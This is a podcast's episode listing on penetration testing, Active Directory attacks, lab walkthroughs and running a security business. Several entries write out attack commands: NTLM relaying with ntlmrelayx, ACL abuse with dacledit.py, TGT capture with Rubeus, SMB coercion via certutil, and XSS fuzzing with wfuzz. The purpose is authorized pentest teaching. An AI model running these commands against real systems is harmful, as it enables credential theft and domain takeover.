7 Minute Security
By: Brian Johnson
Language: en
Categories: Technology, News
7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.
Episodes
7MS #705: A Phishing Campaign Fail Tale
Dec 12, 2025This might be obvious, but security is not all domain admin dancing and maximum pwnage. Sometimes, despite my best efforts, a security project does a faceplant. Today's episode focuses on a phishing campaign that had plenty of "bites" but got immediately shut down – for reasons I still don't understand.
Duration: 00:21:387MS #704: DIY Pentest Dropbox Tips – Part 12
Dec 05, 2025Hola friends! My week has very much been about trying to turnaround pentest dropboxes as quickly as possible. In that adventure, I came across two time-saving discoveries:
Using a Proxmox LXC as a persistent remote access method Writing a Proxmox post-deployment script that installs Splashtop on the Windows VM, and resets the admin passwords on both VMs, all from the Proxmox SSH console without touching the console on either VMIf you feel some of this is better seen than said, on this week's 7MinSec.club Tuesday TOOLSday broadcast we show this in more detail.
Duration: 00:24:467MS #703: Tales of Pentest Pwnage – Part 79
Nov 28, 2025Happy Thanksgiving week friends! Today we're celebrating a turkey and pie overload by sharing another fun tale of pentest pwnage! It involves using pygpoabuse to hijack a GPO and turn it into our pentesting puppet! Muahahahahaah!!!! Also:
This week over at 7MinSec.club we looked at how to defend against some common SQL attacks We're very close to offering our brand new LPLITE:GOAD 3-day pentest course (likely in mid-January). It will get announced on 7MinSec.club first, so please make sure you're subscribed there (it's free!) Did you miss our talk called Should You Hire AI Run Your Next Pe... Duration: 00:22:167MS #702: Should You Hire AI to Run Your Next Pentest?
Nov 21, 2025Hello friends, in today's episode I give an audio summary of a talk I gave this week at the MN GOVIT Symposium called "Should You Hire AI to Run Your Next Pentest?" It's not a pro-AI celebration, nor is it an anti-AI bashing. Rather, the talk focuses on my experiences using both free and paid AI services to guide me through an Active Directory penetration test.
Duration: 00:21:227MS #701: What I'm Working on This Week – Part 5
Nov 14, 2025Hello friends! This week I'm talking about what I'm working on this week, including:
Preparing a talk called Should You Hire AI to Run Your Next Pentest for the Minnesota GOVIT Symposium. Playing with Lithnet AD password protection (I will show this live on next week's Tuesday TOOLSday). The Light Pentest logo contest has a winner! Duration: 00:18:297MS #700: Pretender
Nov 07, 2025Today is episode 700 of the 7MinSec podcast! Oh my gosh. My mom didn't think we could do it, but we did. Instead of a big blowout with huge news, giveaways and special guests, today is a pretty standard issue episode with a (nearly) 7-minute run time!
The topic of today's episode is Pretender (which you can download here and read a lot more about here). The tool authors explain the motivation behind the tool: "We designed pretender with the single purpose to obtain machine-in-the-middle positions combining the techniques of mitm6 and only the name resolution spoofing portion of Respo...
Duration: 00:08:027MS #699: Pre-Travel Security Tips
Oct 31, 2025Today we discuss some pre-travel tips you can use before hopping on a plane to start a work/personal adventure. Tips include:
Updating the family DR/BCP plan Lightening your purse/wallet Validating/testing backups and restores Ensuring your auto coverage is up to snuff Duration: 00:30:047MS #698: Baby's First ProjectDiscovery
Oct 24, 2025Today I give a quick review of the cloud version of ProjectDiscovery (not a sponsor!).
Duration: 00:24:337MS #697: Pwning Ninja Hacker Academy – Part 4
Oct 18, 2025Today your pal and mine Joe "The Machine" Skeen pwn one of the two Ninja Hacker Academy domains! This pwnage included:
Swiping service tickets in the name of high-priv users Dumping secrets from wmorkstations Disabling AV Extracting hashes of gMSA accountsWe didn't get the second domain pwned, and so I was originally thinking about doing a part 5 in November, but changed my mind. Going forward, I'm thinking about doing longer, all-in-one hacking livestreams where we cover things like NHA from start to finish. My first thought would be to do one long livestream where we complete NHA sta...
Duration: 00:13:227MS #696: Baby's First Security Ticketing System
Oct 10, 2025In today's episode:
I got a new podcast doodad I really like JitBit as a security ticketing system (not a sponsor) The Threat Hunting with Velociraptor 2-day training was great. Highly recommend. I got inspired to take this class after watching the 1-hour primer here. Duration: 00:27:457MS #695: Tales of Pentest Pwnage - Part 78
Oct 03, 2025Today's tale of pentest pwnage involves:
Using mssqlkaren to dump sensitive goodies out of SCCM Using a specific fork of bloodhound to find machines I could force password resets on (warning: don't do this in prod…read this!)Don't forget to check out our weekly Tuesday TOOLSday – live every Tuesday at 10 a.m. over at 7MinSec.club!
Duration: 00:15:577MS #694: Tales of Pentest Pwnage – Part 77
Sep 26, 2025Hey friends, today I talk about how fun it was two combine two cool pentest tactics, put them in a blender, and move from local admin to mid-tier system admin access (with full control over hundreds of systems)! The Tuesday TOOLSday video we did over at 7minsec.club will help bring this to life as well.
Duration: 00:33:117MS #693: Pwning Ninja Hacker Academy – Part 3
Sep 19, 2025This week your pal and mine Joe "The Machine" Skeen kept picking away at pwning Ninja Hacker Academy. To review where we've been in parts 1 and 2:
We found a SQL injection on a box called SQL, got a privileged Sliver beacon on it, and dumped mimikatz info From that dump, we used the SQL box hash to do a BloodHound run, which revealed that we had excessive permissions over the Computers OU We useddacledit.py to give ourselves too much permission on the Computers OUToday we:
Did an RBCD attack against the WEB box Requested a service tic... Duration: 00:28:447MS #692: Tales of Pentest Pwnage – Part 76
Sep 12, 2025Happy Friday! Today's another hot pile of pentest pwnage. To make it easy on myself I'm going to share the whole narrative that I wrote up for someone else:
I was on a pentest where a DA account would sweep the networks every few minutes over SMB and hit my box. But SMB signing was on literally everywhere. The fine folks here recommended I try relaying to something NOT SMB, like MSSQL. This article had good context on that: https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/.
I relayed the DA account to a SQL box that B...
Duration: 00:32:457MS #691: Tales of Pentest Pwnage – Part 75
Sep 05, 2025Holy schnikes, today might be my favorite tale of pentest pwnage ever. Do I say that almost every episode? yes. Do I mean it? Yes. Here are all the commands/links to supplement today's episode:
Got an SA account to a SQL server through Snaffler-ing With that SA account, I learned how to coerce Web auth from within a SQL shell – read more about that here I relayed that Web auth with ntlmrelayx -smb2support -t ldap://dc --delegate-access --escalate-user lowpriv I didn't have a machine account under my control, so I did SPNless RBCD on my lowpriv accou... Duration: 00:31:397MS #690: Tales of Pentest Pwnage – Part 74
Aug 29, 2025Today's tale of pentest pwnage is a classic case of "If your head is buried in the pentest sand, pop it out for a while, touch grass, and re-enumerate what you've already enumerated, because that can lead to absolute GOLD!"
Duration: 00:21:137MS #689: Pwning Ninja Hacker Academy – Part 2
Aug 22, 2025Hello friends! Today your friend and mine, Joe "The Machine" Skeen joins me as we keep chipping away at pwning Ninja Hacker Academy! Today's pwnage includes:
"Upgrading" our Sliver C2 connection to a full system shell using PrintSpoofer! Abusing nanodump to do an lsass minidump….and find our first cred. Analyzing BloodHound data to find (and own) excessive permissions against Active Directory objects Duration: 00:15:407MS #688: Building a Pentest Training Course Is Fun and Frustrating
Aug 16, 2025Today I talk about a subject I love while also driving me crazy at the same time: building a pentest training course! Specifically, I dissect a fun/frustrating GPO attack that I need to build very carefully so that every student can pwn it while also not breaking the domain for everybody else. I also talk about how three different flavors of AI failed me in solving a simple task.
Duration: 00:22:137MS #687: A Peek into the 7MS Mail Bag – Part 5
Aug 11, 2025Hi friends, we're doing something today we haven't done in a hot minute: take a dip into the 7MinSec mail bag! Today we cover these questions:
If I'm starting a solo business venture as a security consultancy, is it a good idea to join forces with other solo security business owners and form a consortium of sorts? Have you ever had anything go catastrophically wrong during a pentest? Yes, and this is an important link in the story: https://github.com/fortra/impacket/issues/1436 What ever happened with the annoying apartment neighbor who stomped around like a rhino wh... Duration: 00:57:267MS #686: Our New Pentest Training Course is Almost Ready
Aug 01, 2025Oh man, I'm so excited I can hardly sleep. Our new three-day (4 hours per day) training is getting closer to general release. I talk about the good/bad/ugly of putting together an attack-sensitive lab that students can abuse (but hopefully not break!), and the technical/curriculum-writing challenges that go along with it.
Duration: 00:23:307MS #685: The Time My Neighbor Almost Got Scammed Out of $13K
Jul 25, 2025Today's kind of a "story time with your friend Brian" episode: a tale of how my neighbor almost got scammed out of $13k. The story has a lot of red flags we can all keep in mind to keep ourselves (as well as kids/friends/parents/etc.) safer from these types of shenanigans.
Duration: 00:22:567MS #684: Pwning Ninja Hacker Academy
Jul 18, 2025Hey friends, today we start pwning Ninja Hacker Academy – cool CTF-style lab that has you start with no cred and try to conquer domain admin on two domains!
Duration: 00:22:507MS #683: What I'm Working on This Week - Part 4
Jul 12, 2025This week I'm working on a mixed bag of fun security and marketing things:
A pentest I'm stuck on My latest lab CTF obsession: Ninja Hacker Academy A cool "about 7MinSec" marketing video that was recorded in a pro studio! Duration: 00:30:507MS #682: Securing Your Family During and After a Disaster – Part 7
Jul 04, 2025Today's episode is a downer! We talk about things you might want to have buttoned up for when you are eventually not alive anymore:
Living will Buried vs. cremated? Funeral plans Funeral PHOTOS?I also talk about how my dad broke his ribs while trying to break a chimpmunk, and how a freak 4-wheeler accident also had my ribs in agony.
Duration: 00:30:597MS #681: Pentesting GOAD – Part 3
Jun 27, 2025Today Joe "The Machine" Skeen and I pwn the third and final realm in the world of GOAD (Game of Active Directory): essos.local! The way we go about it is to do a WinRM connection to our previously-pwned Kingslanding domain, coerce authentication out of MEEREEN (the DC for essos.local) and then capture/abuse the TGT with Rubeus! Enjoy.
Duration: 00:18:187MS #680: Tips for a Better Purple Team Experience
Jun 20, 2025Today I share some tips on creating a better purple team experience for your customers, including:
Setting up communication channels and cadence Giving a heads-up on highs/criticals during testing (not waiting until report time) Where appropriate, record videos of attacks to give them more context Duration: 00:26:487MS #679: Tales of Pentest Pwnage – Part 73
Jun 13, 2025In today's tale of pentest pwnage I talk about a cool ADCS ESC3 attack – which I also did live on this week's Tuesday TOOLSday. I also talk about Exegol's licensing plans (and how it might break your pentest deployments if you use ProxmoxRox).
Duration: 00:30:127MS #678: How to Succeed in Business Without Really Crying – Part 22
Jun 06, 2025Today I share some tips on presenting a wide variety of content to a wide variety of audiences, including:
Knowing your audience before you touch PowerPoint Understanding your presentation physical hookups and presentation surfaces A different way to screen-share via Teams that makes resolution/smoothness way better! Duration: 00:33:397MS #677: That One Time I Was a Victim of a Supply Chain Attack
May 30, 2025Hi everybody. Today I take it easy (because my brain is friend from the short week) to tell you about the time I think my HP laptop was compromised at the factory!
Duration: 00:13:487MS #676: Tales of Pentest Pwnage – Part 72
May 27, 2025Today's fun tale of pentest pwnage discuss an attack path that would, in my opinion, probably be impossible to detect…until it's too late.
Duration: 00:59:347MS #675: Pentesting GOAD – Part 2
May 16, 2025Hey friends! Today Joe "The Machine" Skeen and I tackled GOAD (Game of Active Directory) again – this time covering:
SQL link abuse between two domains Forging inter-realm TGTs to conquer the coveted sevenkingdoms.local!Join us next month when we aim to overtake essos.local, which will make us rulers over all realms!
Duration: 00:31:417MS #674: Tales of Pentest Pwnage – Part 71
May 09, 2025Today's tale of pentest pwnage is another great one! We talk about:
The SPNless RBCD attack (covered in more detail in this episode) Importance of looking at all "branches" of outbound permissions that your user has in BloodHound This devilishly effective MSOL-account-stealing PowerShell script (obfuscate it first!) A personal update on my frustration with ringing in my ears Duration: 00:49:007MS #673: ProxmoxRox
May 03, 2025Today we're excited to release ProxmoxRox – a repo of info and scripts to help you quickly spin up Ubuntu and Windows VMs. Also, some important news items:
7MinSec.club in-person meeting is happening Wednesday, May 14! More details here. We did our second Tuesday TOOLSday this week and showed you some local privesc techniques when you have local admin on an endpoint Duration: 00:30:317MS #672: Tales of Pentest Pwnage – Part 70
Apr 25, 2025Today's a fun tale of pentest pwnage where we leveraged a WinRM service ticket in combination with the shadow credentials attack, then connected to an important system using evil-winrm and make our getaway with some privileged Kerberos TGTs! I also share an (intentionally) vague story about a personal struggle I could use your thoughts/prayers/vibes with.
Duration: 00:55:077MS #671: Pentesting GOAD
Apr 18, 2025Hello! This week Joe "The Machine" Skeen and I kicked off a series all about pentesting GOAD (Game of Active Directory). In part one we covered:
Checking for null session enumeration on domain controllers Enumerating systems with and without SMB signing Scraping AD user account descriptions Capturing hashes using Responder Cracking hashes with Hashcat Duration: 00:25:187MS #670: Adventures in Self-Hosting Security Services
Apr 11, 2025Hi friends, today I'm kicking off a series talking about the good/bad/ugly of hosting security services. Today I talk specifically about transfer.zip. By self-hosting your own instance of transfer.zip, you can send and receive HUGE files that are end-to-end encrypted using WebRTC. Sweet! I also supplemented today's episode with a short live video over at 7MinSec.club.
Duration: 00:36:487MS #669: What I'm Working on This Week – Part 3
Apr 04, 2025Hi friends, in this edition of what I'm working on this week:
3 pulse-pounding pentests that had…problems Something I'm calling the unshadow/reshadow credentials attack Heads-up on a new video experiment I'm going to try next week Duration: 00:42:377MS #668: Tales of Pentest Pwnage – Part 69
Mar 28, 2025Hola friends! Today's tale of pentest pwnage talks about abusing Exchange and the Azure ADSync account! Links to the discussed things:
adconnectdump – for all your ADSync account dumping needs! Adam Chester PowerShell script to dump MSOL service account dacledit.py (part of Impacket) to give myself full write privileges on the MSOL sync account: dacledit.py -action 'write' -rights 'FullControl' -principal lowpriv -target MSOL-SYNC-ACCOUNT -dc-ip 1.2.3.4 domain.com/EXCHANGEBOX$ -k -no-pass Looking to tighten up your Exchange permissions – check out this crazy detailed post Duration: 00:30:227MS #667: Pentesting GOAD SCCM - Part 2!
Mar 21, 2025Hey friends, our good buddy Joe "The Machine" Skeen and I are back this week with part 2 (check out part 1!) tackling GOAD SCCM again! Spoiler alert: this time we get DA! YAY!
Definitely check out these handy SCCM resources to help you – whether it be in the lab or IRL (in real life):
GOAD SCCM walkthrough MisconfigurationManager – tremendous resource for enumerating/attacking/privesc-ing within SCCM This gist from Adam Chester will help you decrypt SCCM creds stored in SQL Duration: 00:28:527MS #666: Tales of Pentest Pwnage – Part 68
Mar 14, 2025Today we have a smattering of miscellaneous pentest tips to help you pwn all the stuff!
Selective Snaffling with Snaffler The importance of having plenty of dropbox disk space – for redundant remote connectivity and PXE abuse! TGTs can be fun for SMB riffling, targeted Snaffling, netexec-ing and Evil-WinRMing! Duration: 00:45:357MS #665: What I'm Working on This Week - Part 2
Mar 07, 2025Hello there friends, I'm doing another "what I'm working on this week" episode which includes:
BPATTY v1.6 release – big/cool/new content to share here PWPUSH – this looks to be an awesome way (both paid and free) to securely share files and passwords Duration: 00:28:497MS #664: What I'm Working on This Week
Feb 28, 2025In today's episode I talk about what I'm working on this week, including:
Playing with Sliver C2 and pairing it with ShellcodePack Talking about Netexecer, my upcoming tool that helps automate some of the early/boring stuff in an internal pentest A gotcha to watch out for if utilizing netexec's MSSQL upload/download functionality Duration: 00:25:387MS #663: Pentesting GOAD SCCM
Feb 21, 2025Today we live-hack an SCCM server via GOAD SCCM using some attack guidance from Misconfiguration Manager! Attacks include:
Unauthenticated PXE attack PXE (with password) attack Relaying the machine account of the MECM box over to the SQL server to get local admin Duration: 00:29:417MS #662: Pentesting Potatoes - Part 2
Feb 14, 2025Hi friends, today we're talking about pentesting potatoes (not really, but this episode is sort of a homage to episode 333 where I went to Boise to do a controls assessment and ended up doing an impromptu physical pentest and social engineer exercise). I talk about what a blast I'm having hunting APTs in XINTRA LABS, and two cool tools I'm building with the help of Cursor:
A wrapper for Netexec that quickly finds roastable users, machines without SMB signing, clients running Webclient and more. A sifter of Snaffler-captured files to zero in even closer on interesting things such a... Duration: 00:37:397MS #661: Baby's First Hetzner and Ludus – Part 2
Feb 08, 2025Today we continue our journey from last week where we spun up a Hetzner cloud server and Ludus.cloud SCCM pentesting range! Topics include:
Building a Proxmox Backup Server (this YouTube video was super helpful) Bridging a second WAN IP to the Hetzner/Ludus server Wrestling with the Hetzner (10-rule limit!) software firewall When attacking SCCM – you can get a version of pxethief that runs in Linux! Duration: 00:37:537MS #660: Baby's First Hetzner and Ludus
Feb 01, 2025I had an absolute ball this week spinning up my first Hetzner server, though it was not without some drama (firewall config frustrations and failing hard drives). Once I got past that, though, I got my first taste of the amazing world of Ludus.cloud, where I spun up a vulnerable Microsoft SCCM lab and have started to pwn it. Can't say enough good things about Ludus.cloud, but I certainly tried in this episode!
Duration: 00:34:347MS #659: Eating the Security Dog Food - Part 8
Jan 24, 2025Today I'm excited about some tools/automation I've been working on to help shore up the 7MinSec security program, including:
Using Retype as a document repository Leveraging the Nessus API to automate the downloading/correlating of scan data Monitoring markdown files for "last update" changes using a basic Python script Duration: 00:28:297MS #658: WPA3 Downgrade Attacks
Jan 17, 2025Hey friends, today we cover:
The shiny new 7MinSec Club BPATTY updates A talk-through of the WPA3 downgrade attack, complemented by the YouTube livestream Duration: 00:32:587MS #657: Writing Rad Security Documentation with Retype
Jan 10, 2025Hello friends! Today we're talking about a neat and quick-to-setup documentation service called Retype. In a nutshell, you can get Retype installed on GitHub pages in about 5 minutes and be writing beautiful markdown pages (with built-in search) immediately. I still absolutely love Docusaurus, but I think Retype definitely gives it a run for its money.
Duration: 00:20:367MS #656: How to Succeed in Business Without Really Crying - Part 21
Jan 03, 2025Happy new year friends! Today we talk about business/personal resolutions, including:
New year's resolution on the 7MinSec biz side to have a better work/life balance New training offering in the works Considering Substack as a communications platform A mental health booster that I came across mostly by accident Duration: 00:45:017MS #655: Happy Hacking Holidays
Dec 30, 2024Today we're doing a milkshake of several topics: wireless pentest pwnage, automating the boring pentest stuff with cursor.ai, and some closing business thoughts at 7MinSec celebrates its 7th year as a security consultancy. Links discussed today:
AWUS036ACH wifi card (not my favorite anymore) Panda PAU09 N600 (love this one!) The very important Github issue that helped me better understand BPFs and WPA3 attacks TrustedSec article on WPA3 downgrade attacks Duration: 00:58:087MS #654: Tales of Pentest Pwnage – Part 67
Dec 13, 2024Today we've got some super cool stuff to cover today! First up, BPATTY v1.4 is out and has a slug of cool things:
A whole new section on old-school wifi tools like airmon-ng, aireplay-ng and airodump-ng Syntax on using two different tools to parse creds from Dehashed An updated tutorial on using Gophish for phishing campaignsThe cocoa-flavored cherry on top is a tale of pentest pwnage that includes:
Abusing SCCM Finding gold in SQL configuration/security audits Duration: 00:41:507MS #653: How to Succeed in Business Without Really Crying – Part 20
Dec 06, 2024Hey friends, today we're talking about tips to effectively present your technical assessment to a variety of audiences – from lovely IT and security nerds to C-levels, the board and beyond!
Duration: 00:49:597MS #652: Securing Your Mental Health - Part 6
Dec 02, 2024Today's episode talks about some things that helped me get through a stressful and hospital-visit-filled Thanksgiving week, including:
Journaling Meditation (An activity I'm ashamed of but has actually done wonders for my mental health) Duration: 00:41:527MS #651: Tales of Pentest Pwnage – Part 66
Nov 22, 2024Hey friends, we've got a short but sweet tale of pentest pwnage for you today. Key lessons learned:
Definitely consider BallisKit for your EDR-evasion needs If you get local admin to a box, enumerate, enumerate, enumerate! There might be a delicious task or service set to run as a domain admin that can quickly escalate your privileges! Duration: 00:31:077MS #650: Tales of Pentest Pwnage - Part 65
Nov 15, 2024Oooooo, giggidy! Today is (once again) my favorite tale of pentest pwnage. I learned about a feature of PowerUpSQL that helped me find a "hidden" SQL account, and that account ended up being the key to the entire pentest! I wonder how many hidden SQL accounts I've missed on past pentests….SIGH! Check out the awesome BloodHound gang thread about this here.
Also, can't get Rubeus monitor mode to capture TGTs to the registry? Try output to file instead:
rubeus monitor /interval:5 /nowrap /runfor:60 /consoleoutfile:c:\users\public\some-innocent-looking-file.log
In the tangent department...
Duration: 00:53:407MS #649: First Impressions of Twingate
Nov 08, 2024Today we take a look at a zero-trust / ditch-your-VPN solution called Twingate (not a sponsor but we'd like them to be)! It also doubles nicely as a primary or backup connection for your DIY pentest dropboxes which we've talked about quite a bit here. In other news, we've moved from Teachable to Coursestack, so if you've bought training/ebooks with us before, you should've received some emails from us last Friday and can access our new training portal here. (If you THINK you should've received enrollment emails from CourseStack and didn't, drop us a line here.)
In the tang...
Duration: 01:12:127MS #648: First Impressions of Level.io
Nov 01, 2024Hey friends, today I'm sharing my first (and non-sponsored) impressions of Level.io, a cool tool for managing Windows, Mac and Linux endpoints. It fits a nice little niche in our pentest dropbox deployments, it has an attractive price point and their support is fantastic.
Duration: 00:40:177MS #647: How to Succeed in Business Without Really Crying – Part 19
Oct 25, 2024Today we're talkin' business – specifically how to make your report delivery meetings calm, cool and collect (both for you and the client!).
Duration: 00:22:237MS #646: Baby's First Incident Response with Velociraptor
Oct 18, 2024Hey friends, today I'm putting my blue hat on and dipping my toes in incident response by way of playing with Velociraptor, a very cool (and free!) tool to find evil in your environment. Perhaps even better than the price tag, Velociraptor runs as a single binary you can deploy to spin up a server and then request endpoints to "phone home" to you by way of GPO scheduled task. The things I talk about in this episode and show in the YouTube stream are all based off of this awesome presentation from Eric Capuano, who also was kind enou...
Duration: 00:16:157MS #645: How to Succeed in Business Without Really Crying - Part 18
Oct 14, 2024Today I do a short travelogue about my trip to Washington, geek out about some cool training I did with Velociraptor, ponder drowning myself in blue team knowledge with XINTRA LABS, and share some thoughts about the conference talk I gave called 7 Ways to Panic a Pentester.
Duration: 00:31:027MS #644: Tales of Pentest Pwnage – Part 64
Oct 04, 2024Hey! I'm speaking in Wanatchee, Washington next week at the NCESD conference about 7 ways to panic a pentester! Today's tale of pentest pwnage is a great reminder to enumerate, enumerate, enumerate! It also emphases that cracking NETLM/NETNTLMv1 isn't super easy to remember the steps for (at least for me) but this crack.sh article makes it a bit easier!
Duration: 00:41:097MS #643: DIY Pentest Dropbox Tips – Part 11
Sep 27, 2024Today we continue where we left off in episode 641, but this time talking about how to automatically deploy and install a Ubuntu-based dropbox! I also share some love for exegol as an all-in-one Active Directory pentesting platform.
Duration: 00:26:407MS #642: Interview with Ron Cole of Immersive Labs
Sep 23, 2024Ron Cole of Immersive Labs joins us to talk pentest war stories, essential skills he learned while serving on a SOC, and the various pentest training and range platforms you can use to sharpen your security skills! Here are the links Ron shared during our discussion:
VetSec Fortinet Veterans Program Immersive Labs Cyber Million FedVTE Duration: 00:42:007MS #641: DIY Pentest Dropbox Tips – Part 10
Sep 13, 2024Today we're revisiting the fun world of automating pentest dropboxes using Proxmox, Ansible, Cursor and Level. Plus, a tease about how all this talk about automation is getting us excited for a long-term project: creating a free/community edition of Light Pentest LITE training!
Duration: 00:27:427MS #640: Tales of Pentest Pwnage – Part 63
Sep 07, 2024This was my favorite pentest tale of pwnage to date! There's a lot to cover in this episode so I'm going to try and bullet out the TLDR version here:
Sprinkled farmer files around the environment Found high-priv boxes with WebClient enabled Added "ghost" machine to the Active Directory (we'll call it GHOSTY) RBCD attack to be able to impersonate a domain admin using the CIFS/SMB service against the victim system where some higher-priv users were sitting Use net.py to add myself to local admin on the victim host Find a vulnerable service to hijack and have... Duration: 00:43:197MS #639: Tales of Pentest Pwnage - Part 62
Sep 03, 2024Today's tale of pentest pwnage talks about the dark powers of the net.py script from impacket.
Duration: 00:07:027MS #638: Tales of Pentest Pwnage – Part 61
Aug 23, 2024Today we're talking pentesting – specifically some mini gems that can help you escalate local/domain/SQL privileges:
Check the C: drive! If you get local admin and the system itself looks boring, check root of C – might have some interesting scripts or folders with tools that have creds in them. Also look at Look at Get-ScheduledTasks Find ids and passwords easily in Snaffler output with this Snaffler cleaner script There's a ton of gold to (potentially) be found in SQL servers – check out my notes on using PowerUpSQL to find misconfigs and agent jobs you might able to abuse! Duration: 00:32:447MS #637: BPATTY[RELOADED] Release Party
Aug 17, 2024Hello friends, I'm excited to release BPATTY[RELOADED] into the world at https://bpatty.rocks! – which stands for Brian's Pentesting and Technical Tips for You! It's a knowledge base of IT and security bits that help me do a better job doing security stuff! Today I do an ACTUAL 7-minute episode (GASP…what a concept!) covering my favorite bits on the site so far. Enjoy!
Duration: 00:07:017MS #636: A Prelude to BPATTY(RELOADED)
Aug 12, 2024Artificial hype alert! I'm working on a NEW version of BPATTY (Brian's Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It's weird. But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigger/better/stronger/faster/cooler than BPATTY v1 (which is now in archive/read-only mode).
Duration: 00:11:217MS #635: Eating the Security Dog Food - Part 7
Aug 03, 2024Today we're talking about eating the security dog food – specifically:
Satisfying critical security control #1 Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data) Duration: 00:45:267MS #634: Tales of Pentest Pwnage - Part 60
Jul 26, 2024Hi, today's tale of pentest pwnage covers a few wins and one loss:
A cool opportunity to drop Farmer "crops" to a domain admin's desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login Duration: 00:32:387MS #633: How to Create a Security Knowledgebase with Docusaurus
Jul 19, 2024Hey friends, we're doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It's cool, it's free, it's from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin' in about 5 minutes. Important files include:
docusaurus.config.js – for setting the site title and key config settings sidebars.js – used to create/edit navigation bar menus /src/css/custom.css – to style the site Duration: 00:14:167MS #632: Tales of Pentest Pwnage – Part 59
Jul 12, 2024Today's tale of pentest pwnage includes some fun stuff, including:
SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you're ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I'm not 100% sure on this, but I think scheduled tasks capture Kerberos tickets temporarily to workstation(s). If you're on a compromised machine, try Get-ScheduledTask -taskname "name" | select * to get information about what context the attack is running under. DonPAPI got an upgrade recently with a focus on ev... Duration: 00:48:097MS #631: Tales of Pentest Pwnage – Part 58
Jul 07, 2024Hi friends, today's a tale full of test tips and tools to help you in your adventures in pentesting!
SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud'homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot – find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares Snaffler – finds all the interesting SMB shares and juicy file contents Efflanrs – takes the raw Snaffler log and turns it into an interactive Web app! RubeusToCcache – a small tool to convert Base64-encoded .kirbi tickets from Rubeus into .cca... Duration: 00:15:577MS #630: Epic Road Trip Served with Security Sprinkles
Jul 01, 2024Today I recap a two week persona/biz road trip and talk about the security stuff that got sprinkled into it, including:
Family members who don't care about their personal security Weakpass – a cool collection of word lists for brute-forcing and spraying that I'd never heard of Working on two security Webinars for Netwrix (here's part 1: Mastering Password Security & Active Directory Monitoring, and and part 2: Advanced Strategies for SQL Server Protection & Sensitive Information Security) The moment we though our credit card was stolen at a waterpark A shameless plug for our fun interview with Stu the recruiter Some intern... Duration: 00:45:277MS #629: Interview with Stu Musil of Ambient Consulting
Jun 24, 2024Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions:
How do you properly vet a recruiter you don't know, but who offers a job opportunity you're interested in? What questions should you ask a potential recruiter to get a feel for their level of experience in the industry (hint, if a recruiter doesn't even have a LinkedIn page, that's probably a red flag) Resume tips: Finding th... Duration: 00:46:237MS #628: How to Succeed in Business Without Really Crying – Part 17
Jun 14, 2024Hey friends, today we talk about some not-so-glamorous but ever-so-important stuff related to running a cybersecurity consultancy, including:
Taking an inventory of all the SaaS stuff your business uses – to keep an eye on spending, know when services are expiring, and track which credit card the services are tied to (so the services don't almost get cancelled like some did with me!) Tracking domain names, and setting up your own automated rules to notify you well ahead of time when a domain is expiring (maybe that passion project is never gonna happen…time to let those old domains go 🙂 M... Duration: 00:09:367MS #627: Migrating from vCenter to Proxmox – Part 2
Jun 10, 2024Hey friends, today we continue our series all about migrating from VMWare to the world Proxmox! Specifically:
Getting my first Proxmox-based NUCs out in the field for live engagements! Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to to add Proxmox to those bare-metals with a simple wizard. I couldn't figure out how to get a Proxmox VM as the main firewall for the whole Proxmox node, but it turns out it helps to RTFM. When getting a bare-metal OS/hypervisor installed, be careful in that the pro... Duration: 00:35:367MS #626: Web Pentesting Pastiche
May 31, 2024Hey friends, today we've got a security milkshake episode about Web app pentesting. Specifically we talk about:
Burp Suite Enterprise Caido – a lightweight alternative to Burp wfuzz – Web fuzzer. Using a proxy:wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt –sc 200 "https://somedomain.com/shopping?&qty=%2FUZZ" -p 10.0.7.11:8080 KNOXSS – for XSS testing – pairs nicely with this wrapper: https://github.com/xnl-h4ck3r/knoxnlIn the tangent dept, I moan about how I hate some things about Proxmox but am also starting to love it.
In the tangent #2 department, I talk about tinnitus and ac
Duration: 00:50:107MS #625: A Peek into the 7MS Mail Bag - Part 4
May 24, 2024Road trip time! I've been traveling this week doing some fun security projects, and thought all this highway time would be a perfect opportunity to take a dip into the 7MS mail bag! Today's questions include:
How do you price internal network penetration tests? Have you ever had to deal with a difficult client situation, and how did you resolve it? Are you done going after certs? Spoiler: no – I'm interested in doing the XINTRA labs (not sure if it includes a cert) Do you provide managed services or just stick with more "one and done" assessment work? You sai... Duration: 00:44:007MS #624: Tales of Pentest Pwnage – Part 57
May 17, 2024Today's tale of pentest pwnage is all about my new favorite attack called SPN-less RBCD. We did a teaser episode last week that actually ended up being a full episode all about the attack, and even step by step commands to pull it off. But I didn't want today's episode to just be "Hey friends, check out the YouTube version of this attack!" so I also cover:
Our first first impressions of Burp Enterprise Why I have a real hard time believing you have to follow all these steps to install Kali on Proxmox Duration: 00:29:047MS #623: Prelude to a Tale of Pentest Pwnage
May 10, 2024Today's prelude to a tale of pentest pwnage talks about something called "spnless RBCD" (resource-based constrained delegation). The show notes don't format well here in the podcast notes, so head to 7minsec.com to see the notes in all their glory.
Duration: 00:24:527MS #622: Migrating from vCenter to Proxmox - Part 1
